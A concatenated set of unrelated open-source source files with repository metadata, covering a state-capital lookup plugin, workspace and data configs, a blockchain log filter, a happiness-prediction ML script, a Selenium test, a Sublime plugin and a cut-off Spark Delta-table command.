'american samoa': 'as',
'arizona': 'az',
'arkansas': 'ar',
'california': 'ca',
'colorado': 'co',
'connecticut': 'ct',
'delaware': 'de',
'district of columbia': 'dc',
'florida': 'fl',
'georgia': 'ga',
'guam': 'gu',
'hawaii': 'hi',
'idaho': 'id',
'illinois': 'il',
'indiana': 'in',
'iowa': 'ia',
'kansas': 'ks',
'kentucky': 'ky',
'louisiana': 'la',
'maine': 'me',
'maryland': 'md',
'massachusetts': 'ma',
'michigan': 'mi',
'minnesota': 'mn',
'mississippi': 'ms',
'missouri': 'mo',
'montana': 'mt',
'nebraska': 'ne',
'nevada': 'nv',
'new hampshire': 'nh',
'new jersey': 'nj',
'new mexico': 'nm',
'new york': 'ny',
'north carolina': 'nc',
'north dakota': 'nd',
'northern mariana islands': 'mp',
'ohio': 'oh',
'oklahoma': 'ok',
'oregon': 'or',
'pennsylvania': 'pa',
'puerto rico': 'pr',
'rhode island': 'ri',
'south carolina': 'sc',
'south dakota': 'sd',
'tennessee': 'tn',
'texas': 'tx',
'utah': 'ut',
'vermont': 'vt',
'virgin islands': 'vi',
'virginia': 'va',
'washington': 'wa',
'west virginia': 'wv',
'wisconsin': 'wi',
'wyoming': 'wy'
}
if s:
try:
capital = capital_dict[s].title()
abbreviation = abbrev_dict[s].upper()
jarvis.say("The capital of " + s.title() + " is " + capital)
jarvis.say("The postal abbreviation is " + abbreviation)
except KeyError:
jarvis.say("Please enter a valid U.S. state")
else:
jarvis.say("Please input a state. Usage: stateinfo [state]")
|
d3b0fc64d61f0b2303ffe7d19f5d98b2dbd4f725
|
ccb0740c4846e943003b075bddd52fd7c884b6d8
|
/auto_pose/ae/ae_init_workspace.py
|
2810290b2731be6448e3049c9bdf0b783c5dcdbd
|
[
"MIT"
] |
permissive
|
DLR-RM/AugmentedAutoencoder
|
87a8bc5e32832cadbbfaafca8e19f15f2ce7718a
|
9f0a56f622fabf6200d9f034fcb2eef106997118
|
refs/heads/master
| 2022-09-12T08:51:59.086448
| 2022-08-16T09:43:02
| 2022-08-16T09:43:02
| 156,195,670
| 347
| 106
|
MIT
| 2022-06-22T00:55:31
| 2018-11-05T09:56:25
|
Python
|
UTF-8
|
Python
| false
| false
| 1,154
|
py
|
ae_init_workspace.py
|
# -*- coding: utf-8 -*-
import os
import glob
import shutil
from . import utils as u
def main():
workspace_path = os.environ.get('AE_WORKSPACE_PATH')
if workspace_path == None:
print('Please define a workspace path:\n')
print('export AE_WORKSPACE_PATH=/path/to/workspace\n')
exit(-1)
if len(os.listdir(workspace_path)) > 0:
print('\n[Error] Workspace folder needs to be empty.\n')
exit(-1)
cfg_path = os.path.join(workspace_path, 'cfg' )
eval_cfg_path = os.path.join(workspace_path, 'cfg_eval' )
experiments_path = os.path.join(workspace_path, 'experiments' )
dataset_path = os.path.join(workspace_path, 'tmp_datasets' )
this_dir = os.path.dirname(os.path.abspath(__file__))
if not os.path.exists(cfg_path):
cfg_template_path = os.path.join(this_dir, 'cfg')
shutil.copytree(cfg_template_path, cfg_path)
if not os.path.exists(eval_cfg_path):
eval_cfg_template_path = os.path.join(this_dir, 'cfg_eval')
shutil.copytree(eval_cfg_template_path, eval_cfg_path)
if not os.path.exists(experiments_path):
os.makedirs(experiments_path)
if not os.path.exists(dataset_path):
os.makedirs(dataset_path)
|
6a3166ea0a330d0aa7a32918e221ac6ab43cde26
|
88dd4380e0d33d4a118ca4e69e4ca9b1c8f45e1f
|
/pyspedas/de2/config.py
|
ef2b881b78af31487e9481cd6fc326e6ae3a1a45
|
[
"MIT"
] |
permissive
|
spedas/pyspedas
|
16d34015961e3a4d3eaf8637d3cb6abca95df1b1
|
1d07b148753afa96e148c5835ed9545c507577da
|
refs/heads/master
| 2023-09-01T16:07:47.131334
| 2023-08-25T17:15:35
| 2023-08-25T17:15:35
| 167,614,292
| 125
| 61
|
MIT
| 2023-09-08T18:41:27
| 2019-01-25T21:11:14
|
Python
|
UTF-8
|
Python
| false
| false
| 407
|
py
|
config.py
|
import os
CONFIG = {'local_data_dir': 'de2_data/',
'remote_data_dir': 'https://spdf.gsfc.nasa.gov/pub/data/de/de2/'}
# override local data directory with environment variables
if os.environ.get('SPEDAS_DATA_DIR'):
CONFIG['local_data_dir'] = os.sep.join([os.environ['SPEDAS_DATA_DIR'], 'de2'])
if os.environ.get('DE2_DATA_DIR'):
CONFIG['local_data_dir'] = os.environ['DE2_DATA_DIR']
|
f670234cb7522f50115fd69955bf551634b4a765
|
5770a3fc8bd224d926d4aff5b7d8f1863f145cab
|
/quarkchain/cluster/log_filter.py
|
764a260177201d7ef6c32bae4e6159529af1ae7b
|
[
"MIT"
] |
permissive
|
QuarkChain/pyquarkchain
|
d06a59d630fd0c4a07e1c10548ba044329da95ba
|
2068153c9386a1eacb5eccb8cf93d98f87537203
|
refs/heads/master
| 2023-02-27T14:16:07.419575
| 2022-04-18T20:35:59
| 2022-04-18T20:35:59
| 143,354,339
| 253
| 133
|
MIT
| 2023-02-07T21:54:01
| 2018-08-02T23:28:47
|
Python
|
UTF-8
|
Python
| false
| false
| 6,320
|
py
|
log_filter.py
|
import time
from typing import List, Optional
from quarkchain.cluster.shard_db_operator import ShardDbOperator
from quarkchain.core import Address, Log, MinorBlock, MinorBlockHeader
from quarkchain.evm.bloom import bloom
from quarkchain.utils import Logger
class LogFilter:
"""
Filter class for logs, blocks, pending tx, etc.
TODO: For now only supports filtering logs.
"""
TIMEOUT = 10 # seconds
@classmethod
def create_from_block_candidates(cls, db, addresses, topics, candidate_blocks):
return LogFilter(db, addresses, topics, candidate_blocks=candidate_blocks)
@classmethod
def create_from_end_block_header(
cls, db, addresses, topics, end_block_header, size
):
return LogFilter(
db, addresses, topics, end_block_header=end_block_header, size=size
)
def __init__(
self,
db: ShardDbOperator,
addresses: List[Address],
topics: List[List[bytes]],
end_block_header: Optional[MinorBlockHeader] = None,
size: int = 0,
candidate_blocks: Optional[List[MinorBlock]] = None,
block_hash: Optional[str] = None,
):
"""
`topics` is a list of lists where each one expresses the OR semantics,
while the whole list itself is connected by AND. For details check the
Ethereum JSONRPC spec.
"""
self.db = db
# if `addresses` present, should be in the same shard
self.recipients = [addr.recipient for addr in addresses]
self.end_block_header = end_block_header
self.size = size
self.candidate_blocks = candidate_blocks
# in case filter is instantiated through constructor instead of factory methods
if candidate_blocks is not None and (end_block_header is not None or size != 0):
raise ValueError(
"Should pass in either candidate blocks or end block header and size"
)
if candidate_blocks is not None:
self.candidate_blocks = sorted(
candidate_blocks, key=lambda x: x.header.height
)
self.block_hash = block_hash # TODO: not supported yet
# construct bloom bits:
# innermost: an integer with 3 bits set
# outer: a list of those integers are connected by OR operator
# outermost: a list of those lists are connected by AND operator
self.bloom_bits = [] # type: List[List[int]]
for r in self.recipients:
b = bloom(r)
self.bloom_bits.append([b])
self.topics = topics
for tp_list in topics:
if not tp_list:
# regard as wildcard
continue
bloom_list = []
for tp in tp_list:
bloom_list.append(bloom(tp))
self.bloom_bits.append(bloom_list)
# a timestamp to control timeout. will be set upon running
self.start_ts = None
def _get_block_candidates(self) -> List[MinorBlock]:
"""Use given criteria to generate potential blocks matching the bloom."""
def should_skip(block: MinorBlock) -> bool:
should_skip_block = False
# same byte order as in bloom.py
header_bloom = block.header.bloom
for bit_list in self.bloom_bits:
if not any((header_bloom & i) == i for i in bit_list):
should_skip_block = True
break
return should_skip_block
ret = []
if self.candidate_blocks is not None:
ret = [b for b in self.candidate_blocks if not should_skip(b)]
else:
end_block_hash = self.end_block_header.get_hash()
for i in range(self.size):
block = self.db.get_minor_block_by_hash(end_block_hash)
if not block:
Logger.error(
"No block found for height {} at shard {}".format(
i, self.db.branch.get_full_shard_id()
)
)
continue
if not should_skip(block):
ret.append(block)
end_block_hash = block.header.hash_prev_block
ret = list(reversed(ret))
return ret
def _get_logs(self, blocks: List[MinorBlock]) -> List[Log]:
"""Given potential blocks, re-run tx to find exact matches."""
ret = []
for b_i, block in enumerate(blocks):
tx_list_len = len(block.tx_list)
deposit_hlist = self.db.get_xshard_deposit_hash_list(
block.header.get_hash()
)
deposit_hlist_len = 0 if not deposit_hlist else len(deposit_hlist.hlist)
for i in range(tx_list_len + deposit_hlist_len):
# only provide deposit list when needed
r = block.get_receipt(
self.db.db, i, None if i < tx_list_len else deposit_hlist
)
for log in r.logs:
# empty recipient means no filtering
if self.recipients and log.recipient not in self.recipients:
continue
if self._log_topics_match(log):
ret.append(log)
if (1 + b_i) % 100 == 0 and time.time() - self.start_ts > LogFilter.TIMEOUT:
raise Exception("Filter timeout")
return ret
def _log_topics_match(self, log: Log) -> bool:
"""Whether a log matches given criteria in constructor. Position / order matters."""
# https://github.com/ethereum/wiki/wiki/JSON-RPC#a-note-on-specifying-topic-filters
for criteria, log_topic in zip(self.topics, log.topics):
if not criteria:
continue
if isinstance(criteria, list): # list of bytes
if not any(c == log_topic for c in criteria):
return False
else: # single criteria as bytes
if criteria != log_topic:
return False
return True
def run(self) -> List[Log]:
self.start_ts = time.time()
candidate_blocks = self._get_block_candidates()
logs = self._get_logs(candidate_blocks)
return logs
|
e8d17295c83e81cb437acae1d3e3cf7c77fde24e
|
0218f8cf2751e1662ee69f526ec6995ee657092d
|
/src/tasks/tianchi/happiness/test.py
|
41333e26d5fa1c1c5a34bd7dc251af879ba6b3d5
|
[] |
no_license
|
lipengyuer/DataScience
|
d8996004366907bfa6e303b879a452772cfedb48
|
52af044150d362c81f6c94617170a759f54ef9c5
|
refs/heads/master
| 2022-01-19T05:42:23.517231
| 2022-01-08T10:12:43
| 2022-01-08T10:12:43
| 157,036,574
| 116
| 60
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,526
|
py
|
test.py
|
import pandas as pd
import sklearn as sk
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.linear_model import SGDClassifier
from sklearn.ensemble import GradientBoostingClassifier, AdaBoostClassifier, GradientBoostingRegressor
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import KFold
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from scipy.stats import pearsonr
import otherData
import numpy as np
from sklearn.utils.class_weight import compute_class_weight
from sklearn.model_selection import GridSearchCV
features = None
def findNearInt(f):
anInt = int(f)
gaps = [anInt - f, anInt + 1 - f]
if np.abs(gaps[0]) < np.abs(gaps[1]):
return anInt
else:
return anInt + 1
def processHeight(h):
if h<150: return 1
elif 150<h<160: return 2
elif 160<h<170: return 3
elif 170<h<180: return 4
else: return 5
def processWeight(w):
if w<70: return 1
elif 70<w<90: return 2
elif 90<w<110: return 3
elif 110<w<130: return 4
else: return 5
def cal_BMI_index(h, w):
h = h/100
w = w/2
if h<1 or h>3: h=1.7
if w<30 or w>150: w=75
bmi = w/h**2
return bmi
def ifTooShort(gender, height):
if gender==1:
if height<165: return 1
else: return 0
else:
if height<160: return 1
else: return 0
def ifTooHight(gender, height):
if gender==1:
if height>195: return 1
else: return 0
else:
if height<185: return 1
else: return 0
def ifTooHeavy(gender, weight):
if gender==1:
if weight>200: return 1
else: return 0
else:
if weight>140: return 1
else: return 0
def ifTooLight(gender, weight):
if gender==1:
if weight<100: return 1
else: return 0
else:
if weight<70: return 1
else: return 0
def processAge(age):
if age<25: return 1
if 25<=age<30: return 2
if 30<=age<40: return 3
if 40 <= age < 60: return 4
if 60 <= age < 70: return 5
if age>=70: return 6
def featureEngineering(data):
global features
data['no_income'] = data['income'].apply(lambda x: 1 if x <0 else 0)
data['income'] = data['income'].apply(lambda x: 1000000 if x > 1000000 else x)\
.apply(lambda x: 1000 if x <1000 else x)
data['income'] = data['income'] / 10000
data['inc_exp'] /= 10000
data['inc_exp_gap'] = data['inc_exp']/data['income']
data['inc_exp_gap_neg'] = data['inc_exp_gap'].apply(lambda x: 1 if x<1 else 0)
data['no_s_income'] = data['s_income'].apply(lambda x: 1 if x < 0 else 0)
data['s_income'] = data['s_income'].apply(lambda x: 1000000 if x>1000000 else x)\
.apply(lambda x: 10000 if x < 1000 else x)
data['s_income'] = data['s_income'] / 10000
data['ratio_s_income'] = data['income']/ data['s_income']
data['no_family_income'] = data['family_income'].apply(lambda x: 1 if x < 0 else 0)
data['family_income'] = data['family_income'].apply(lambda x: 1000000 if x>1000000 else x).\
apply(lambda x: 1000 if x<1000 else x)
data['family_income'] = data['family_income'] / 10000
data['ratio_income_in_family'] = data['income']*data['family_m']/data['family_income']
data = data.fillna(-1)
# data['s_birth'] = data['s_birth'].apply(lambda x: 2015 if x<1900 else x)
# data['f_birth'] = data['f_birth'].apply(lambda x: 2015 if x < 1900 else x)
# data['m_birth'] = data['m_birth'].apply(lambda x: 2015 if x < 1900 else x)
data['birth'] = data['birth'].apply(lambda x: 2015 if x < 1900 else x)
data['s_birth'] = data.apply(lambda x: x['birth'] if x['s_birth']<0 else x['s_birth'], axis=1)
data['f_birth'] = data.apply(lambda x: x['birth']-20 if x['f_birth']<0 else x['f_birth'], axis=1)
data['m_birth'] = data.apply(lambda x: x['birth']-20 if x['m_birth']<0 else x['m_birth'], axis=1)
data['f_m_birth_delta'] = data['f_birth'] - data['m_birth']
data['f_birth_delta'] = data['birth'] - data['f_birth']
data['m_birth_delta'] = data['birth'] - data['m_birth']
data['birth'] = 2015 - data['birth']
data['s_birth'] = 2015 - data['s_birth']
data['f_birth'] = 2015 - data['f_birth']
data['m_birth'] = 2015 - data['m_birth']
data['is_nianqingren'] = data['birth'].apply(lambda x: 1 if x < 25 and x>20 else 0)
data['is_laoren'] = data['birth'].apply(lambda x: 1 if x > 70 else 0)
data['if_retired'] = data['birth'] - 60
data['if_retired'] = data['if_retired'].apply(lambda x: 0 if x < 0 else 1)
data['s_birth'] = data['s_birth'].apply(lambda x: 100 if x > 90 else x)
data['birth'] = data['birth'].apply(lambda x: 100 if x > 100 else x)
data['realBirth'] = data['birth']
data['s_birth'] = data['s_birth'].apply(processAge)
data['birth'] = data['birth'].apply(processAge)
data = data.drop(['f_birth', 's_birth'], axis=1)
# print(data['f_birth_delta'].describe())
#print(data[data['f_birth_delta']<0])
data['inc_exp'] = data['inc_exp'].apply(lambda x: 10000 if x <0 else x)
data['inc_exp'] = data['inc_exp']/10000
data['inc_ability'] = data['inc_ability'].apply(lambda x: 2 if x< 0 else x)
data['marital_1st'] = data['marital_1st'].apply(lambda x: 2015 if x==9997 else x)
data['marital_now'] = data['marital_now'].apply(lambda x: 2015 if x == 9997 else x)
data['marital_1st'] = 2015 - data['marital_1st']
data['marital_now'] = 2015 - data['marital_now']
data['bmi'] = data['weight_jin'] / (data['height_cm'] * data['height_cm'] / 20000)
data['is_too_short'] = data.apply(lambda x: ifTooShort(x.gender, x.height_cm), axis=1)
data['is_too_heavy'] = data.apply(lambda x: ifTooHeavy(x.gender, x.weight_jin), axis=1)
data['is_too_hight'] = data.apply(lambda x: ifTooHight(x.gender, x.height_cm), axis=1)
data['is_too_light'] = data.apply(lambda x: ifTooLight(x.gender, x.weight_jin), axis=1)
data['bmi_index'] = data.apply(lambda x: cal_BMI_index(x.height_cm, x.weight_jin), axis=1)
data['height_cm'] = data['height_cm'].apply(processHeight)
data['weight_jin'] = data['weight_jin'].apply(processWeight)
data['join_party'] = data['join_party'].apply(lambda x: 2015 if x==-1 else x)
data['join_party'] = 2015 - data['join_party']
data['join_party_if'] = data['join_party'].apply(lambda x: 1 if x ==0 else 0)
data['house'] = data['house'].apply(lambda x: -1 if x==96 else x)
data['family_income'] = data['family_income'].apply(lambda x: -1 if x == 99999996 else x)
data['floor_area_per'] = data['floor_area']/data['family_m']
data['class_change_before'] = data['class'] - data['class_10_before']
data['class_change_after'] = data['class_10_after'] - data['class']
data['class_change214'] = data['class'] - data['class_14']
data['edu_yr'] = 2015- data['edu_yr']
data['age_highest_edu'] = data['edu_yr'] - data['birth']
data['f_edu'] = data['f_edu'].apply(lambda x: 1 if x < 0 else x)
data['m_edu'] = data['m_edu'].apply(lambda x: 1 if x < 0 else x)
data['edu'] = data['edu'].apply(lambda x: 1 if x < 0 else x)
data['f_m_edu_gap'] = data['f_edu'] - data['m_edu']
data['f_edu_gap'] = data['edu'] - data['f_edu']
data['m_edu_gap'] = data['edu'] - data['m_edu']
data['status_peer_low'] = data['status_peer'].apply(lambda x: 1 if x==3 else 0)
data['status_peer_high'] = data['status_peer'].apply(lambda x: 1 if x == 1 else 0)
data['status_3_before_low'] = data['status_3_before'].apply(lambda x: 1 if x == 3 else 0)
data['status_3_before_high'] = data['status_3_before'].apply(lambda x: 1 if x == 1 else 0)
data['inc_ability_in'] = data['inc_ability'].apply(lambda x: 1 if x == 4 else 0)
data['trust_5_neg'] = data['trust_5'].apply(lambda x: 1 if x == 1 else 0)
data['trust_8_neg'] = data['trust_5'].apply(lambda x: 1 if x == 1 else 0)
data['trust_13_neg'] = data['trust_5'].apply(lambda x: 1 if x == 1 else 0)
data['family_status_neg'] = data['family_status'].apply(lambda x: 1 if x == 1 else 0)
data['first_job_age'] = data['birth'] - data['work_yr']
data['equity_neg'] = data['equity'].apply(lambda x: 1 if x == 1 else 0)
data['depression_neg'] = data['depression'].apply(lambda x: 1 if x == 1 else 0)
data['body_metal_neg'] = data.\
apply(lambda x: 1 if x['depression'] == 1 and x['health_problem']==1 else 0,\
axis=1)
data['leisure'] = data.apply(lambda x: 1 if x['leisure_1'] + x['leisure_2'] +\
x['leisure_3'] + x['leisure_4'] + x['leisure_5'] < 10 else 0, axis=1)
pub_servce_fs = ['public_service_1','public_service_2','public_service_3','public_service_4','public_service_5','public_service_6','public_service_7','public_service_8','public_service_9']
data[pub_servce_fs] = data[pub_servce_fs].applymap(lambda x: 50 if x < 0 else x)
data[pub_servce_fs] /= 20
data[pub_servce_fs] = data[pub_servce_fs].applymap(lambda x: int(x))
trustFs = ['trust_' + str(i) for i in range(1, 14)]
data[trustFs] = data[trustFs].applymap(lambda x: 1 if x<0 else x)
# data = data.applymap(lambda x: 0 if type(x)==str else x in y)
#print(data.dtypes)
#print(data.values.shape, 'qwe')
data = otherData.addOtherData(data)
stopFeatures = ['invest_other', 'property_other', 'edu_other', 'survey_time', 'realBirth']
#'province','city', 'county', 'nationality',
data = data.drop(stopFeatures, axis=1)
# features = ['income', 'gender', 'religion', 'edu']
if features==None:
features = []
for featureName in data.columns:
#print(featureName, data.dtypes[featureName])
# if data.dtypes[featureName]==int:
# if 'income' in featureName or 'GDP' in featureName:
features.append(featureName)
data = data[features]
return data
def stastics(data):
print(data.groupby(['happiness']).count())
def loadData(fileName):
data = pd.read_csv(fileName)
data = data.drop(['id'], axis=1)
stastics(data)
data = data[data['happiness']>0]
#print(data[['f_birth']])
data = data.fillna(-1)
y = data[['happiness']]
data = data.drop(['happiness'], axis=1)
x = featureEngineering(data)
print("age is : ", x['birth'].describe())
# print(x.columns)
# trainX, testX, trainY, testY = train_test_split(x, y, test_size=0.2)
return x,y#trainX, testX, trainY, testY
def loadContestData(fileName):
data = pd.read_csv(fileName)
res = data[['id']]
data = data.drop(['id'], axis=1)
data = featureEngineering(data)
return res, data
def evaluation(pred, y):
count = 0
cost = 0
for i in range(len(y)):
if pred[i]==y[i][0]: count += 1
cost += (pred[i]-y[i][0])**2
#print(pred[i], y[i][0])
cost /= len(y)
#print(count/len(y))
return count/len(y), cost
from sklearn.tree import DecisionTreeClassifier
import time
def KFoldTest(trainX, trainY):
kf = KFold(n_splits=10, random_state=int(time.time()))
totalAcc = 0
totalTrainingAcc = 0
cost = 0
trainingCost = 0
for trainIndex, testIndex in kf.split(trainX):
# print(trainX.size, trainY.size)
trainInput, trainOutput = trainX.iloc[trainIndex], trainY.iloc[trainIndex]
# print(trainInput['edu_yr'])
testInput, testOutput = trainX.iloc[testIndex], trainY.iloc[testIndex]
weight = compute_class_weight('balanced',[1,2,3,4,5], list(map(lambda x: x[0], trainOutput.values)))
weight = [[i+1, weight[i]] for i in range(len(weight))]
weight = dict(weight)
weight = {1:1/104, 2:1/497, 3:1/1159, 4:1/4818, 5:1/1410}
for key in weight: weight[key] = weight[key]**0.55
# clf = RandomForestRegressor(n_estimators=200, max_depth=7, n_jobs=8, criterion='mse', \
# max_features=0.3, bootstrap=False)
# clf = AdaBoostClassifier(DecisionTreeClassifier(max_depth=10),
# algorithm="SAMME",
# n_estimators=200)
# clf = GradientBoostingClassifier( n_estimators=500, learning_rate=.01, max_depth=10,
# random_state=nt(time.time()), max_features=0.3,\
# min_samples_leaf=20, subsample=0.9)
clf = GradientBoostingRegressor(loss='huber', n_estimators=200, learning_rate=.01,
max_depth=10,
random_state=int(time.time()), max_features=0.5,\
min_samples_leaf=30, subsample=0.5)
clf.fit(trainInput, trainOutput.values)
pred = clf.predict(trainInput)
trainacc, traincostn = evaluation(pred, trainOutput.values)
pred = clf.predict(testInput)
acc, costn = evaluation(pred, testOutput.values)
print("training acc", trainacc, traincostn,trainOutput.size, 'testing acc', acc, costn ,testOutput.size)
totalAcc += acc
cost += costn
totalTrainingAcc += trainacc
trainingCost += traincostn
print("k-fold crossvalidation:", totalAcc/10, 'cost is', cost/10)
print("in training is ", totalTrainingAcc/10, trainingCost/10)
def gridSearch(trainX, trainY):
parameters = {'loss':['ls'], 'n_estimators':[1000],
'learning_rate':[0.01, 0.008], 'max_depth':[10, 15, 20],
'random_state':[int(time.time())], 'max_features':[0.1,0.2,0.3],
'min_samples_leaf':[10,30], 'subsample':[0.9]}
gbdt = GradientBoostingRegressor()
#DT = DecisionTreeClassifier()
clf = GridSearchCV(gbdt, parameters, n_jobs=-1, verbose=2, cv=5, scoring='neg_mean_squared_error')
clf.fit(trainX, trainY.values)
cv_result = pd.DataFrame.from_dict(clf.cv_results_)
with open('cv_result.csv', 'w') as f:
cv_result.to_csv(f)
if __name__ == '__main__':
rootPath = './data/'
trainX, trainY = loadData(rootPath + 'happiness_train_complete.csv')
#print(trainX)
# trainX, trainY = loadData(rootPath + 'happiness_train_abbr.csv')
# trainX = abs(trainX)
# selector = SelectKBest(chi2, k=80) # Ñ¡Ôñk¸ö×î¼ÑÌØÕ÷
# selector.fit(trainX, trainY)
# trainX = selector.transform(trainX)
#gridSearch(trainX, trainY)
KFoldTest(trainX, trainY)
# clf = GradientBoostingRegressor(loss='ls', n_estimators=2000, learning_rate=.01, max_depth=10,
# random_state=int(time.time()), max_features=0.2,
# min_samples_leaf=30, subsample=0.5)
# clf.fit(trainX, trainY)
# res, contData = loadContestData(rootPath + 'happiness_test_complete.csv')
# labels = clf.predict(contData)
# res['happiness'] = labels
# res = res[['id', 'happiness']]
# res.to_csv(rootPath + 'myRes.csv', index=0)
"""happiness ...
1 104 ... 104
2 497 ... 497
3 1159 ... 1159
4 4818 ... 4818
5 1410 ... 1410
find happiness==4 at first ...
"""
|
6d1eadf913841139532155119635bb293b6ef5b1
|
2b319ab54d06a304397c43176ede37ae8669c6df
|
/ruby-publify/browser_test.py
|
e21a2bda6b36708641ea043a9e09820fd98e3cf8
|
[] |
no_license
|
cloudius-systems/osv-apps
|
54c389eb72f100a6e8485f92aa4553896c4bc8e5
|
22e1541ca18d3794053b9ca61671508a2d1944ec
|
refs/heads/master
| 2023-06-08T01:13:22.161834
| 2023-05-31T15:49:10
| 2023-05-31T15:49:10
| 14,896,375
| 122
| 69
| null | 2023-01-21T01:34:28
| 2013-12-03T14:44:26
|
Makefile
|
UTF-8
|
Python
| false
| false
| 2,993
|
py
|
browser_test.py
|
import sys
import subprocess
import signal
import re
from selenium import webdriver
def do_browser_test():
try:
driver = webdriver.Firefox()
driver.implicitly_wait(5) # seconds
driver.get('http://192.168.122.89:3000/')
driver.implicitly_wait(3) # seconds
blog_name = driver.find_element_by_id('setting_blog_name')
blog_name.send_keys(u'OSv blog')
email = driver.find_element_by_id('setting_email')
email.send_keys(u'syuu@cloudius-systems.com')
button = driver.find_element_by_id('submit')
button.click()
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'admin').click()
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'Articles').click()
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'New Article').click()
# Submit articles
for i in range(1, 20):
driver.implicitly_wait(3) # seconds
body = driver.find_element_by_id('article_body_and_extended')
body.send_keys(u'abcdef12345')
title = driver.find_element_by_id('article_title')
title.send_keys(u'article%d' % i)
title.submit()
driver.find_element_by_link_text(u'New article').click()
# Get submitted articles
driver.get('http://192.168.122.89:3000/')
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'Last').click()
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'Hello World!').click()
driver.back()
for i in range(1, 10):
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'article%d' % i).click()
driver.back()
driver.get('http://192.168.122.89:3000/')
for i in range(10, 20):
driver.implicitly_wait(3) # seconds
driver.find_element_by_link_text(u'article%d' % i).click()
driver.back()
return True
except Exception, e:
print(e)
return False
qemu = subprocess.Popen("./scripts/run.py -n", shell=True, cwd="../..", stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
while True:
line = qemu.stdout.readline().strip()
print(line)
if re.search(r'Listening on 0.0.0.0:3000', line) is not None:
result = do_browser_test()
subprocess.check_call(['killall', '-s', 'SIGINT', 'qemu-system-x86_64'])
qemu.wait()
if result == True:
break
else:
sys.exit(1)
if re.search(r'Aborted', line) is not None:
subprocess.check_call(['killall', '-s', 'SIGKILL', 'qemu-system-x86_64'])
qemu.wait()
sys.exit(1)
if qemu.poll() is not None:
print("qemu died")
sys.exit(1)
|
e2020618f713d39d81a83e1b21aead550b718e0e
|
914faa10e5423efc87d0079248b3eb7df72ed83e
|
/sublime.py
|
8c56ecdbb5d9a8e9bf058abc6e3c42757f2a66ac
|
[
"MIT"
] |
permissive
|
MagicStack/MagicPython
|
cf7b7ae8290b0e997adf6a197b2f5be300391a0a
|
7d0f2b22a5ad8fccbd7341bc7b7a715169283044
|
refs/heads/master
| 2023-08-26T04:16:54.672649
| 2022-10-18T07:43:20
| 2022-10-19T23:20:38
| 43,982,620
| 1,564
| 146
|
MIT
| 2023-02-23T19:40:57
| 2015-10-09T22:13:24
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 536
|
py
|
sublime.py
|
"""A plugin for Sublime Text to enhance f-string editing experience.
Specifically, this plugin simplifies typing of escaped curly braces
in an f-string:
{|}, where | is for cursir, gets replaced with
{{|, when '{' is typed again.
"""
# Used by `settings/sublime/Default.sublime-keymap`.
import sublime_plugin
class FstringbraceCommand(sublime_plugin.WindowCommand):
def run(self):
view = self.window.active_view()
view.run_command('right_delete')
view.run_command('insert', {'characters': '{'})
|
5d509a85c362b631037375ae97708369a3f42906
|
c530897cb72b6943c7226b25824444cad5f3503b
|
/usaspending_api/etl/management/commands/create_delta_table.py
|
ccf56a2fc79dea9c6654423edba7fbe6c691ddf1
|
[
"CC0-1.0"
] |
permissive
|
fedspendingtransparency/usaspending-api
|
fc63a22d32ea0207b7273d3e1ef26ba9dbabc42a
|
38f920438697930ae3ac57bbcaae9034877d8fb7
|
refs/heads/master
| 2023-09-01T22:00:36.633612
| 2023-08-29T18:39:18
| 2023-08-29T18:39:18
| 65,394,827
| 276
| 118
|
CC0-1.0
| 2023-09-14T20:33:15
| 2016-08-10T15:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 3,866
|
py
|
create_delta_table.py
|
from django.core.management.base import BaseCommand
from pyspark.sql import SparkSession
from usaspending_api.config import CONFIG
from usaspending_api.common.helpers.spark_helpers import (
configure_spark_session,
get_jvm_logger,
get_active_spark_session,
)
from usaspending_api.etl.management.commands.load_query_to_delta import TABLE_SPEC as LOAD_QUERY_TABLE_SPEC
from usaspending_api.etl.management.commands.load_table_to_delta import TABLE_SPEC as LOAD_TABLE_TABLE_SPEC
TABLE_SPEC = {**LOAD_TABLE_TABLE_SPEC, **LOAD_QUERY_TABLE_SPEC}
class Command(BaseCommand):
help = """
This command creates an empty Delta Table based on the provided --destination-table argument.
"""
def add_arguments(self, parser):
parser.add_argument(
"--destination-table",
type=str,
required=True,
help="The destination Delta Table to write the data",
choices=list(TABLE_SPEC),
)
parser.add_argument(
"--spark-s3-bucket",
type=str,
required=False,
default=CONFIG.SPARK_S3_BUCKET,
help="The destination bucket in S3 to write the data",
)
parser.add_argument(
"--alt-db",
type=str,
required=False,
help="An alternate database (aka schema) in which to create this table, overriding the TABLE_SPEC db",
)
parser.add_argument(
"--alt-name",
type=str,
required=False,
help="An alternate delta table name for the created table, overriding the TABLE_SPEC destination_table "
"name",
)
def handle(self, *args, **options):
extra_conf = {
# Config for Delta Lake tables and SQL. Need these to keep Dela table metadata in the metastore
"spark.sql.extensions": "io.delta.sql.DeltaSparkSessionExtension",
"spark.sql.catalog.spark_catalog": "org.apache.spark.sql.delta.catalog.DeltaCatalog",
# See comment below about old date and time values cannot parsed without these
"spark.sql.legacy.parquet.datetimeRebaseModeInWrite": "LEGACY", # for dates at/before 1900
"spark.sql.legacy.parquet.int96RebaseModeInWrite": "LEGACY", # for timestamps at/before 1900
"spark.sql.jsonGenerator.ignoreNullFields": "false", # keep nulls in our json
}
spark = get_active_spark_session()
spark_created_by_command = False
if not spark:
spark_created_by_command = True
spark = configure_spark_session(**extra_conf, spark_context=spark) # type: SparkSession
# Setup Logger
logger = get_jvm_logger(spark)
# Resolve Parameters
destination_table = options["destination_table"]
spark_s3_bucket = options["spark_s3_bucket"]
table_spec = TABLE_SPEC[destination_table]
destination_database = options["alt_db"] or table_spec["destination_database"]
destination_table_name = options["alt_name"] or destination_table
# Set the database that will be interacted with for all Delta Lake table Spark-based activity
logger.info(f"Using Spark Database: {destination_database}")
spark.sql(f"create database if not exists {destination_database};")
spark.sql(f"use {destination_database};")
# Define Schema Using CREATE TABLE AS command
spark.sql(
